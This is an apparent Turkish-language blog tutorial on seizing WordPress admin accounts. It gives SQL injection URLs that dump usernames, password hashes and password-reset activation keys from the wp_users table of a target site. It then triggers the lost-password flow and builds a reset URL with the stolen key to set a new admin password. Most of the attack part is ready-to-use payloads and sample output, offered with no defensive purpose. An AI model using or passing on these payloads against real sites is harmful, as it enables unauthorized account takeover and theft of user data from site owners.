Merhaba bügün size wordpress'de şifre sıfırlamayı anlatacam.
Normalde Wordpress sql injection'da user_login,user_pass kolonlarından bilgileri çekeriz . Ama wordpress şifre algoritması olarak portable php password hashing framework kullandığı için bunu kırmak biraz zordur.
Bu şekilde md5 kırma yerine admin mailine aktivasyon kodu göndererek şifre sıfırlamayı nasıl yaparız.
örneğin ;
http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from/**/wp_users/*
Şimdi bizim aktivasyon kodunu alabilmemiz için ilk önce şifreyi unuttum deyip admin mailine aktivasyon
kodunu yollatmamız lazım.
http://hedef.com/wp-login.php?action=lostpassword
burdan admin adını yada mailini yazıp aktivasyon kodunu yollamasını istiyoruz.
Ardından user_pass isimli kolon yerine user_activation_key kolonun yazıp aktivasyon kodunu alıyoruz
http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_activation_key,0x7c)/**/from/**/wp_users/*
user_login : security
user_activation_key : CDFSAlCsTUvBDUMGHTcd
bu şekilde admin ve şifreyi değiştirmek için işimize yarayacak olan aktivasyon kodunu alıyoruz .
wp-login.php?action=rp&key=[Aktivasyon kodunu buraya ]&login=[Kullanici adinida buraya ]
wp-login.php?action=rp&key=CDFSAlCsTUvBDUMGHTcd&login=security
bu şekilde yaptığımızda yeni şifrenizi yazıp admin olarak giriş yapacaksınız.
Not: Eğer ki aktivasyon kodu yollamadan aktivasyon kodu çekmeye çalışırsanız daha önceden aktivasyon
kodu yollanmadığı için " Can not get Length of 'Column Data' " yazar bunun içinde öncelikle
şifremi unuttum diyip aktivasyon kodunu yollayın.
Hiç yorum yok:
Yorum Gönder
Yorumunuz kayıt edilmiştir en kısa sürede kontrol edilip onaylanacaktır.